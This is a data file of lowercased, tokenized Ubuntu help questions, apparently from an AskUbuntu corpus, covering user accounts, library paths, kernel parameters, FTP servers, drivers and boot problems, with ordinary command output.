165026	do i need user 1000 , and can i replace it ?	on my computer running mythbuntu , i 'm having a problem where some important processes are being run by a user called 1000 . $ ps -aux | grep myth warning : bad ps syntax , perhaps a bogus '- ' ? see http : //procps.sf.net/faq.html avahi 1126 0.0 0.0 3568 1536 ? s jul08 0:02 avahi-daemon : running [ mythbuntu.local ] mythtv 1863 0.0 0.8 323960 36096 ? sl jul08 3:38 /usr/bin/mythbackend -- syslog local7 -- user mythtv 1000 2278 0.0 0.0 4060 204 ? ss jul08 0:01 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/share/mythbuntu/session.sh 1000 2281 0.0 0.0 3920 740 ? s jul08 0:00 /usr/bin/dbus-launch -- exit-with-session /usr/share/mythbuntu/session.sh 1000 2336 0.0 0.0 2216 592 ? s jul08 0:00 /bin/sh /usr/bin/mythfrontend -- service root 8365 0.0 0.0 10104 3420 ? ss 17:40 0:00 sshd : mythbuntu [ priv ] 1000 8548 0.1 0.0 10252 1772 ? s 17:40 0:00 sshd : mythbuntu @ notty 1000 8624 0.0 0.0 4132 836 pts/3 s+ 17:41 0:00 grep -- color=auto myth 1000 12749 1.7 6.9 618604 288348 ? sl jul11 148:53 /usr/bin/mythfrontend.real -- syslog local7 this seems to be causing other problems with permissions , because processes run by this user ca n't seem to access commands i need to run from within mythtv and other processes owned by 1000 . so far as i know , there 's only one user on my system that i created , called mythbuntu , and my intention was that user run everything . i do n't know what this 1000 user is or where it came from . $ grep 1000 /etc/passwd mythbuntu : x:1000:1000 : mythbuntu , , , :/home/mythbuntu : /bin/bash is this 1000 user important or a default in some way ? or is there a way i can have this 1000 '' user essentially removed and anything attributed to that user overtaken by the mythbuntu user ? note : this is an extension of an issue i 'm trying to resolve on the ubuntu forums .
165027	why ca n't my program find the libraries in `` /usr/local/lib '' ?	i 'm on ubuntu 10.10 , and i 've just upgraded opencv to 2.4.2 . the problem is that each time i open a new shell and try to compile and run , it compiles but does n't run due to the following error : ./a.out : error while loading shared libraries : libopencv_calib3d.so.2.4 : can not open shared object file : no such file or directory as far as i can see , this file is located in /usr/local/lib/ ! i can get it to run by running the following beforehand : export ld_library_path=/usr/local/lib how can i fix this issue ?
165039	what are packages starting with libcommons-* ?	i 've just seen that many packages have a prefix libcommons-* : moose @ pc07 : ~ $ apt-cache search libcommons-* jsvc - wrapper to launch java applications as daemons libcommons-attributes-java - adds c # /.net-style attributes to java code libcommons-attributes-java-doc - adds c # /.net-style attributes to java code - documentation libcommons-beanutils-java - utility for manipulating javabeans libcommons-beanutils-java-doc - javadoc api for libcommons-beanutils-java libcommons-cli-java - api for working with the command line arguments and options libcommons-codec-java - encoder and decoders such as base64 and hexadecimal codec libcommons-codec-java-doc - encoder and decoders such as base64 and hexadecimal codec - documentation libcommons-collections-java - a set of abstract data type interfaces and implementations libcommons-collections3-java - a set of abstract data type interfaces and implementations libcommons-collections3-java-doc - documentation for libcommons-collections3-java libcommons-daemon-java - library to launch java applications as daemons libcommons-dbcp-java - database connection pooling services libcommons-discovery-java - locates classes that implement a given java interface libcommons-discovery-java-doc - locates classes that implement a given java interface ( documentation ) libcommons-fileupload-java - file upload capability to your servlets and web applications libcommons-httpclient-java - a java ( tm ) library for creating http clients libcommons-httpclient-java-doc - documentation for libcommons-httpclient-java libcommons-io-java - common useful io related classes libcommons-io-java-doc - common useful io related classes - documentation libcommons-jxpath-java - manipulate javabean using xpath syntax libcommons-jxpath-java-doc - javadoc api for libcommons-jxpath-java libcommons-lang-java - extension of the java.lang package libcommons-lang-java-doc - extension of the java.lang package libcommons-logging-java - commmon wrapper interface for several logging apis libcommons-logging-java-doc - commmon wrapper interface for several logging apis ( documentation ) libcommons-net-java - internet protocol suite java library libcommons-pool-java - pooling implementation for java objects libcommons-pool-java-doc - pooling implementation for java objects - documentation libcommons-vfs-java - java api for accessing various filesystems libcommons-vfs-java-doc - java api for accessing various filesystems - documentation libcommons-compress-java - java api for working with tar , zip and bzip2 files libcommons-configuration-java - java based library providing a generic configuration interface libcommons-configuration-java-doc - api documentation for commons-configuration libcommons-dbcp-java-doc - database connection pooling services - documentation libcommons-digester-java - rule based xml java object mapping tool libcommons-digester-java-doc - rule based xml java object mapping tool ( documentation ) libcommons-el-java - implementation of the jsp2.0 expression language interpreter libcommons-javaflow-java - java implementation of continuations concept libcommons-javaflow-java-doc - java implementation of continuations concept - documentation libcommons-jci-eclipse-java - common java interface for various compilers - eclipse jdt libcommons-jci-groovy-java - common java interface for various compilers - groovy libcommons-jci-janino-java - common java interface for various compilers - janino libcommons-jci-java - common java interface for various compilers - core and fam libcommons-jci-java-doc - common java interface for various compilers - documentation libcommons-jci-rhino-java - common java interface for various compilers - javascript libcommons-jexl-java - expression language engine libcommons-launcher-java - cross platform java application launcher libcommons-math-java - java lightweight mathematics and statistics components libcommons-math-java-doc - java lightweight mathematics and statistics components - documentation libcommons-modeler-java - convenience library to use java management extensions ( jmx ) libcommons-modeler-java-doc - documentation and examples for commons modeler libcommons-net2-java - internet protocol suite java library libcommons-net2-java-doc - internet protocol suite java library libcommons-openpgp-java - a common and simple interface for generating and verifying openpgp signatures libcommons-openpgp-java-doc - a common and simple interface for generating and verifying openpgp signatures libcommons-validator-java - ease and speed development and maintenance of validation rules libcommons-validator-java-doc - api documentation for commons validator libcommons-csv-java - a java library for working with csv ( comma separated values ) files libcommons-csv-java-doc - documentation for libcommons-csv-java moose @ pc07 : ~/downloads/matrix-multiplication/java $ all of them seem to be java-packages . but what else do they have in common ? ( i 've seen other prefixes for packages , how do i get to know their meaning by myself ? )
165040	how to create a tar.gz package to upload to your ppa	i have created an application using qt . i have two folders in the project , one containing the source code and other the binaries , makefile etc . i created an archive , used dh_make etc . and uploaded the package to ppa . but my archive simply contains two folders . how do create a tar.gz file which contains usr/share/icons , and other folders as other applications have
165044	why use wine application in ubuntu 12.04 ?	is it really practical to use wine application in ubuntu ? i do n't know if i really need wine applications to installed . that 's why i need some suggestions from the experts whether to download it or not . i have ubuntu 12.04 alongside of windows 7 .
165046	can i change the default of `` block-size '' in commands ?	several commands use -- block-size 1k as the default and i find myself counting numbers . is there a way to automatically and permanently change the block-size of commands like du , ls , df to greater values ?
165055	how can i ensure that my custom written c application runs at startup ?	i have written a command line c application that i need to run every time the system starts up . how would i go about doing this ? i have seen other questions and answers that show ways to do this for pre-installed software via visual menus but this is just a custom written binary that i need to make sure runs after every reboot . is there any way i can do this , or must i write a shell script that runs the binary and find a way to add that to the scripts that get run at startup ? i am running on 10.04 .
165056	why have all my files become read-only ?	okay so i was trying to install spotify onto my ubuntu ... and i do n't know what i did wrong , but i do not have spotify and all of my files have become read-only ( everything in the file system has a padlock on it ) ! ! ! this means i can not do anything in terminal without getting the error that it canot open anything because its a read only file system ... any suggestions ? - thanks for replying so fast ! i tried to follow these instructions on terminal ..none of the stuff was working anyway debian 1 . add this line to your list of repositories by editing your /etc/apt/sources.list deb http : //repository.spotify.com stable non-free 2 . if you want to verify the downloaded packages , you will need to add our public key sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 3 . run apt-get update sudo apt-get update 4 . install spotify ! sudo apt-get install spotify-client now i keep getting this error if i try and do a fsck : permission denied while trying to open /dev/sda1 you must have r/w access to the file system or be root . i think the error happened when it kept telling me dev is not recognised so i tried to install devscripts ... : ( ... which was what someone else suggested ( if you 're having trouble installing spotify ) my history is just the following ..i was trying to do a screenshot but i cant save anything : ( 24 vi/etc/apt/sources.list 25 deb 26 debc ( spotify link ) stable non-free 27 sudo apt-get install devscripts 28 debc http : //repository.spotify.com stable non-free 29 deb ( spotify link ) stable non-free 30 apt-get install debian-reference 31 yes 32 sudo apt-key adv -- keyserver.ubuntu.com -- recv-keys 4e9cff4e 33 sudo add-apt-repository `` deb ( spotify link ) stable non-fr
165059	will ubuntu work if i remove windows ?	i am planning to install ubuntu 12.04 using wubi in windows7 . if in future i want to remove windows ( and then reinstall ) will i be able to keep ubuntu ? assume that i have installed ubuntu in a separate partition .
165068	how to change de `` minimize all windows '' shortcut in xubuntu ?	i have xubuntu on my pc , and i want to minimize all the windows when i press super+d . do yo know how can i do this ? i 've enter to the keybord shortcuts , but i do n't know the `` minimize all windows '' command . can you help me ? thanks a lot .
165069	ubuntu 12.04 not resuming from suspend zenbook ux32vd	this is the first time i installed linux so i might be doing a few things wrong . i have asus zenbook ux32vd , i separated the ssd and hdd , left windows 7 on the hdd and installed ubuntu ( 12.04 x86-64 ) from a pendrive . after the installation ( and also using the live usb ) screen would hardly ever work ( backlight would ) , so i had to close and open the screen 4 or 5 times until it stayed on . to solve this i followed these instructions , which say that you have to change quiet splash to nomodeset in the grub file . this works , except that the laptop now ca n't resume from suspend/standby . i used these instructions to change the grub file , these instructions , unlike the previous say that you have to add nomodeset to quiet splash , i tried both and they both give the same results . i also tried installing the nvidia drivers ( x86-64 which should work for gt 620 m ) but this did n't help and made the system give all kinds or errors . any suggestions ? edit : thank you for the answer , by not resuming i mean nothing , no fan , no backlight , no keyboard backlight . i 'll look at your suggestions now . edit2 : i found that the problem did not occur when using ubuntu 12.10 ( kernel 3.5 )
165071	how to customise ubuntu to have the following features ?	everyone keeps telling me that linux/ubuntu is much more customizable than windows but i seem to be having a problem trying to do the following changes : when pressing home dash button on the left i want ubuntu to go straight to the applications tab . from here i do not want it showing me recently used apps or apps available for download . how do i disable these ? how do i move the minimize , exit and maximize buttons to the right side of the window instead the left side of the window ? also how can i change the orange exit buttons to the colour blue ? when clicking and dragging the mouse , an orange box appears , how can i change it to blue to match my theme ? me a windows fan is really digging ubuntu 's new interface compared to my windows 8 release preview which is a living nightmare .
165075	how to get isolcpus kernel parameter working with precise 12.04 amd64 ?	i 've been testing this stuff trying to reserve some cpus in a host with two intel e5645 but i ca n't get it working for some reason . steps i followed : edit /etc/default/grub and added isolcpus=0,1 to grub_cmdline_linux_default grub_cmdline_linux_default= '' quiet splash isolcpus=0,1 '' run update-grub reboot after that , cat /proc/cmdline reveals : boot_image=/boot/vmlinuz-3.2.0-26-generic root=uuid=52cfedad-40be-41b9-9f88-c282a7ae3f24 ro quiet splash isolcpus=0,1 vt.handoff=7 tested using stress : apt-get install stress & & stress -c 24 monitored using top and pressing 1 to display individual cpu stats . so far no cpus are isolated from the scheduler and all of them are busted by stress . cpu0 : 99.7 % us , 0.3 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu1 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu2 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu3 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu4 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu5 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu6 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu7 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu8 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu9 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu10 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu11 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu12 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu13 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu14 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu15 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu16 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu17 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu18 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu19 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu20 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu21 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu22 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa cpu23 :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa tested the same stuff in centos 6 x86_64 and it works as expected . searched ubuntu and linux bugs database in launchpad but did not find anything so far . is it me being dumb or am i missing something ? hints ? thanks ! refs : http : //www.kernel.org/doc/documentation/kernel-parameters.txt
165077	how to hide hidden directory on ftp client	i have used vsftpd to create ftp server.i am using ubuntu 12.04 desktop version.i have issue with hidden file , when i access server through ftp client its shows all the directory including hidden directory of system started with `` . '' i have used option force_dot_files=no in vsftpd config file but its still listing all the directories . please guide me .
165078	enable backing store feature in ubuntu 12.04	can you tell me how to enable the 'backing store ' feature in ubuntu 12.04 ? i tried adding xserver-command=x +bs to /etc/lightdm/lightdm.conf . with this configuration setting xserver fails to start correctly . i get a frozen window with a message saying resolution is set to a small value ( i think it was 800x480 , but i ca n't recall ) .
165088	ca n't choose the os at startup	i tried to install ubuntu . my system already has windows 7 . i would like to keep the existing windows installation . after installation of ubuntu i restarted the pc , but there is no boot menu . as per the opinion of the linux team the following commands were used . sudo grub-install /dev/sda sudo update-grub the command executed correctly , but there is still no boot menu . what do i have to do ? please help me .
165089	ubuntu is n't starting after unexpected shutdown	due to power cut , my pc went off . then , when i opened it , ubuntu was n't starting . i tried to run ubuntu from live cd , it 's not working . now , what should i do ? i can access bios and terminal from recovery mode . update : i have 256,256 & 512 mb ram installed in my pc . after unplugging two 256 mb ram . i 've only 512 mb ram now and my pc now working fine . thanks .
165099	kvm with vt-x and 64-bit machine	i recently got my hands on a new laptop with an i3-2310m which supports the vt-x extension . i want to guest install windows 7 . how do i use vt-x on kvm ? how will the guest os benefit/what more can the guest os access with kvm using vt-x ? does it need additional driver installation in guest os ? this is my first time properly owning and using a 64-bit machine -- do i install 32-bit or 64-bit guest os ? finally , does any other virtualization software does a better job of using vt-x right now ?
165103	how to install xerox workcentre 5020	cups does n't have a driver for workcentre 5020b . but the printer is detected by ubuntu cups and the config utility . what should i do to install this printer to my desktop system ? i want this set up as as local printer via usb on ubuntu 12.04 .
165104	connect the dial-up modem to the com-port	i 'm trying to connect a dial-up modem to a com-port in ubuntu . seems that dmesg | grep tty command return that there is the opened serial port , but neither minicom nor wvdial utilities establish the connection with the modem . minicom output : '' welcome to minicom 2.5 options : i18n compiled on may 2 2011 , 00:39:27 . press ctrl-a z for help on special keys '' wvdialconf output : editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : scanning ttys0 first , /dev/modem is a link to it . ttys0 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttys0 < *1 > : atq0 v1 e1 -- ttys0 < *1 > : failed with 9600 baud , next try : 115200 baud ttys0 < *1 > : atq0 v1 e1 -- ttys0 < *1 > : and failed too at 115200 , giving up . modem port scan < *1 > : s1 s2 s3 s4 s5 s6 s7 s8 modem port scan < *1 > : s9 s10 s11 s12 s13 s14 s15 s16 modem port scan < *1 > : s17 s18 s19 s20 s21 s22 s23 s24 modem port scan < *1 > : s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial do you have any ideas how to connect the modem ?
165106	can i configure separate sound volume for each user ?	i want to apply distinct sound volume for distinct users in ubuntu 12.04 . but now all users share the same master volume .
165107	problem with my graphic card	i 've recently installed ubuntu 12.04 . however i 'm having some problems with the graphic drivers . my graphic card is geforce 7150m / nforce 630 . i 've installed a lot of updates , however i can only run ubuntu in 2d and most applications are very slow ( e.g . google earth , or pressing alt+tab ) . does anyone has any idea how i can solve this problem ? i 'd be very grateful . thanks . daniel .
165108	how can i prevent a standard account to mount a specific partition ?	i have a root account from which i do all of my tasks . i set up my partitions to mount at startup . i have also created an account for my younger brother . i do not want him to access specific partitions , while still having access to others . i have : sda5 sda6 sda7 i want to block access to sda5 but want to give him permission to access the other sda partitions . how can i do that ?
165115	cloud instances in openstack ca n't import public ssh key	does anybody know how to actually fix the problem of ubuntu cloud vm instances in openstack not being able to import public keys from nova-api 's meta-data server with the following message : 2012-07-18 11:05:45,409 - util.py [ warning ] : 'http : //169.254.169.254/2009-04-04/meta-data/instance-id ' failed [ 113/120s ] : url error [ [ errno 111 ] connection refused ] 2012-07-18 11:05:52,419 - datasourceec2.py [ critical ] : giving up on md after 120 seconds i 've found numerous mentions of the problem ( e.g . here or here ) and tried turning this iptables rule on/off ( using iptables-save and iptables-apply ) , but it does n't work . the funny rule seems to be : $ iptables -t nat -l -v | grep -n3 169.254.169.254 48- 49-chain nova-network-prerouting ( 1 references ) 50- pkts bytes target prot opt in out source destination 51 : 32 1920 dnat tcp -- any any anywhere 169.254.169.254 tcp dpt : http to:128.131.172.155:8775 52- 0 0 dnat udp -- any any anywhere sneezy.infosys.tuwien.ac.at udp dpt:1000 to:10.0.0.2:1194 53- 54-chain nova-network-float-snat ( 1 references ) is there any good way to manually debug this , by the way ?
165126	how can foreground and background colors be changed for software center ?	there sometimes is n't enough contrast between the letters and background , and i have reached an age that i ca n't tell what 's there . i would prefer either black text on white background , or white text on a black background . running ubuntu 12.04 lts .
165130	acer aspire incompatible with ubuntu 12.04 ?	well i 'm about to install ubuntu 12.04 on my laptop , which is an acer aspire . i would like to know if is there any incompatibility ? i installed this version ( 12.04 ) on an acer aspire and had several troubles with the hardware drivers . i 'll apreciate any help . thanks .
165138	hauppauge remote `` ok '' and `` back '' buttons not working	i 'm having some issues with getting my remote fully functional with ubuntu 12.04 . some of the buttons work , but the ok and back buttons do n't . i could make do without some of the others , but i really need these . my tv card is hauppauge nova dvb-s2 . i have seen some posts around the internet but i have n't had any luck with them . is there a file that contains the mapping that i can edit myself ? thank you for looking , and i hope you can help .
165140	directory not listing on web-browser for ftp server	i have used vsftpd to create ftp server.i am using ubuntu 12.04 desktop version.the problem is that when i hit the ftp : //myservername/ on the browser it shows only index of / name size date modified not listing any files and not asking user name and password . when i use ftp : //username : password @ myservername/ its listing directories . but i do n't want to write user name and password in the address bar . so how do i achieve it ?
165141	in need of driver for c-media cmi8788	i have a ht omega eclaro in a system that i use for ripping vinyl . will i ever be able to use this machine it with ubuntu ?
165143	install history command package	i have ubuntu 10.04.4 lts running on a proxmox openvz container . i imagine it does not come with history because the up arrow on the command line gives me ^ [ [ a plus ... $ history -sh : history : not found but i get this when i trying to install . $ sudo apt-get install history reading package lists ... done building dependency tree reading state information ... done e : could n't find package history what is the correct package name i need to install to get history working ?
165147	bash script to add/remove desktop launchers to unity launcher ?	i 'm trying to write a script to setup my desktop environment after a fresh install . one thing i ca n't figure out is how to pin/unpin items to the unity launcher from a bash script . any ideas ?
165151	eclipse 4 with oracle jdk7 on 12.04 x64 ?	is it possible to install eclipse 4 and get it to work with oracle jdk7 on ubuntu 12.04 x64 ? the best way would be a ppa to apt-get upgrade newer versions . a `` portable '' istall would be okay , too . thanks !
165152	how to transfer ebooks from an iphone	my daughter reads a lovely ebook on her iphone . i wonder if it is possible to transfer this ebook to my laptop so i can read the ebook as well . i am using ubuntu 12.04
165156	why does tomboy say `` synchonized '' but no notes appear on one.ubuntu.com/notes ?	documents are synced with ubuntu one . tomboy notes are the most important thing on my computer , and i synced according to instructions for 10.04 ( tomboy web . ) yet after authentication , https : //one.ubuntu.com/notes says there is nothing there . what gives ?
165158	will ubuntu run smoothly on my 2012 macbook air ?	tech specs : 1.7ghz dual-core intel core i5 ( turbo boost up to 2.6ghz ) with 3mb shared l3 cache 4gb of 1600mhz ddr3l on-board memory intel hd graphics 4000 64gb flash storage
165159	alternate cd install missing wallpapers ?	i 've set up several 12.04 desktop machine using the regular installer . however , on another machine i needed to set up software raid so i used the alternate installer . i noticed however , that the 12.04 wallpapers are not present on this new machine ... just the ones from 11.10 . two questions : 1 ) is this a bug ? 2 ) how to get the 12.04 wallpapers ? thanks !
165161	how can i repair a system with a deleted kernel ?	because i wanted to get more free space on my hdd , i deleted old kernels ( dont ask me why i was so mad. ) . i accidentally deleted the active kernel too ( 3.2.0-27 on ubuntu 12.04 ) . first i could n't boot . i installed the kernels 3.2.0-23 and 3.2.0-27 via a live system ( see here ) . now , when i start my system now , i only get these lines : mountall : event failed fsck from util-linux 2.20.1 /dev/sda1 : clean , 832254/40099840 files , 21092083/160394239 blocks * stopping flush boot log to disk * stopping enabling additional executable binary formats * starting bluetooth daemon other pc specs : intel i5 2500k 4x 3.3 ghz 8 gb ram /dev/sda1 is ubuntu , about 1400gb zotac nvidia gtx 560 asrock z68 pro3 thank you in advance ! edit : here you can find some log files from /var/log : kern.log boot.log
165166	ca n't connect to the internet because of `` no network interface ''	i have installed kubuntu 11.04 in my laptop . this morning when i powered it on and tried to connect to the internet , i ca n't because of `` no network interface '' error . how i can resolve this problem ?
165174	smart status : -- disk failure is imminent	i want to run the check file system tool , but for that i need to unmount the volume , i have just one partition , should i go ahead with unmount and repair . i am new to ubuntu , so please help . ( image )
165176	my hitachi external hdd is not detected	i tried it with window and the hdd is detected so i conclude this is not the hdd problem status when hdd usb is inserted no @ no-laptop : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 5149:13d3 bus 001 device 005 : id 4971:1012 simpletech status when usb is not inserted no @ no-laptop : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 5149:13d3 is there anyway to open my hdd throught ubuntu ?
165180	how could i customize lightdm to load some custom code i made ?	i 've written a code in c++ for a bio-metric lock which i want to add to the log in screen beside the password . any idea from where should i start ?
165183	why does my external hard drive not boot	since the c drive on my dell dimension 4600 has little space left on it , i decided to install ubuntu 12.04 lts on a usb , load ubuntu to my iomega 250 gb external hard drive . i used 2gb for mount point / in ex4 , 4gb for swap space and the rest for /home in ex4 also . i have set the bootloader to the hard drive , and the installation finished fine . after restarting then booting from it , and reinstalling ubuntu on it multiple times , the same error message appears . however i can get to the pink screen and when i choose the first option i get a pink screen which stays for 30mins , or this error message . then after turning the computer off and on again , i go to the second option on the first pink screen which show a lot of white upon black text . then the error message shows . irritatingly , i ca n't type `` help '' to get the commands as my computer keyboard is disabled at this point . as i 'm new i 'm sorry for any missed details . here are some specs of my ( desktop ) computer : 120gb internal hard drive 4 gb ram intel pentium 4 ( 3 ghz ) 128mb geforce fx 5200 ( nvidia ) windows xp sp3 the usb had ubuntu 12.04 loaded onto it from universal usb installer . could someone please tell me how to get ubuntu working and why this happens . thank you .
165191	how do i print a photo on ubuntu ?	i want to use glossy photo paper to get a photo printed . so what i need to do and how do i use this type of paper ? printer info - kodak esp c315
165192	how do i install drivers for the atheros ar8161 ethernet controller ?	i have installed ubuntu 12.04-64 bit on my lenovo ideapad laptop , and the wired ethernet ( lan ) connection does n't work . running the lspci -vv | grep atheros command from the terminal shows me i have the ar8161 gigabit ethernet controller : 02:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 08 ) this looks like a new product whose drivers are not built into ubuntu . how do i install drivers to get the ar8161 working ?
165200	samsung 7 graphics nightmare	i just bought a samsung 7 laptop with the amd radeon hd 6490m an i installed the driver . everything was working smooth and it was rendering nice until i rebooted it . i noticed that it would n't boot my favorite game because of a glsbadrenderrequest . so i went over to the amd catalyst program , and it would n't fire up because it could n't find the graphics card ! ! what do you think is going on ? oh , and that was the latest driver straight from amd . im running 12.04lts .
165203	why a skype instance does n't shut down ?	i 'm using 12.04 64 bits and skype version 4.0.0.8 released yesterday ( http : //blogs.skype.com/garage/2012/07/hotfix_for_multiple_skype_clie.html ) . the problem is : i 'm using skype normally . no problems with that . the problem happen when i try shut down skype . apparently works , but if i check ( ps -aux on console ) , the instance still alive . so , if i shut down and start skype again i receive one message error : `` another skype instance may exist '' . someone knows anything about it ?
165209	how do i report a bug directly to skype ?	skype supplies updated packages for ubuntu via their website and via their partner repository in ubuntu . how do i report a bug directly to the skype team ? is the launchpad packaging team the same that supplies the packages for the skype website ? lets say i have installed the latest version of skype from their website and i stop fishy behavior , were do i report it ? ie : this question is about the package downloaded directly from the skype site , how do i report that as a bug ?
165210	how do i get an xbox 360 controller working ?	i have a microsoft xbox 360 gamepad with the wireless adapter and i was wondering what i would have to install to use them with ubuntu i do know that when using this on windows i have to manually install the drivers for the wireless receiver ( if that is relevant . )
165214	tata photon+ usb modem worked with 11.04 ( software bundled in same usb device ) but gives error on 12.04	tried installing the tata photon+ bundled software which worked in 11.04 , but does'nt install now in 12.04 . some error showing missing kernel modules ( see below ) anyone has a patch ? ? ============= installing version : 21.005.11.03.628 the software is exist . do you want overwrite it ? ( [ y ] /n ) : y local path is : /usr/local/tata_photon+/tata_photon+ installing tata photon+ ... /usr/local/tata_photon+/tata_photon+/driver/ndis_driver usage : modinfo [ -0 ] [ -f field ] [ -k kernelversion ] [ -b basedir ] module ... prints out the information about one or more module ( s ) . if a fieldname is given , just print out that field ( or nothing if not found ) . otherwise , print all information out in a readable form if -0 is given , separate with nul , not newline . if -b is given , use an image of the module tree . error : removing 'cdc_ether ' : no such file or directory error : removing 'usbnet ' : no such file or directory error : removing 'hw_cdc_driver ' : no such file or directory make -c src/ clean make [ 1 ] : entering directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' rm -rf *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags .tmp_versions module.symvers modules.symvers *.order /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/add_header.sh `` clean '' `` /lib/modules/3.2.0-24-generic/build/include/linux/usb '' rmmod -f hw_cdc_driver error : removing 'hw_cdc_driver ' : no such file or directory make [ 1 ] : *** [ clean ] error 1 make [ 1 ] : leaving directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' make : *** [ clean ] error 2 make -c src/ modules make [ 1 ] : entering directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' # /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/add_header.sh `` modules '' `` /lib/modules/3.2.0-24-generic/build/include/linux/usb '' make -c /lib/modules/3.2.0-24-generic/build subdirs=/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-3.2.0-24-generic' cc [ m ] /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:155:27 : fatal error : linux/usb/ncm.h : no such file or directory compilation terminated . make [ 3 ] : *** [ /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o ] error 1 make [ 2 ] : *** [ _module_/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-headers-3.2.0-24-generic' make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' make : *** [ modules ] error 2 make -c src/ install make [ 1 ] : entering directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' # install -m 744 -c hw_cdc_driver.o /lib/modules/3.2.0-24-generic/kernel/drivers/usb/net # depmod -a # modprobe hw_cdc_driver /usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src/add_header.sh `` install '' modprobe hw_cdc_driver fatal : module hw_cdc_driver not found . make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/usr/local/tata_photon+/tata_photon+/driver/ndis_driver/ndis_src/src' make : *** [ install ] error 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.2.0-24-generic/build ) to be all installed ? now please enter any key to finish other installations . ndis is disabled , and only modem can be used . autorunpath=/home/eumesbs/.config/autostart addrunlevel=/etc/rc3.d `/etc/rc3.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc3.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc4.d `/etc/rc4.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc4.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc2.d `/etc/rc2.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc2.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc5.d `/etc/rc5.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc5.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' [ done ] finished , press any key to exit =============
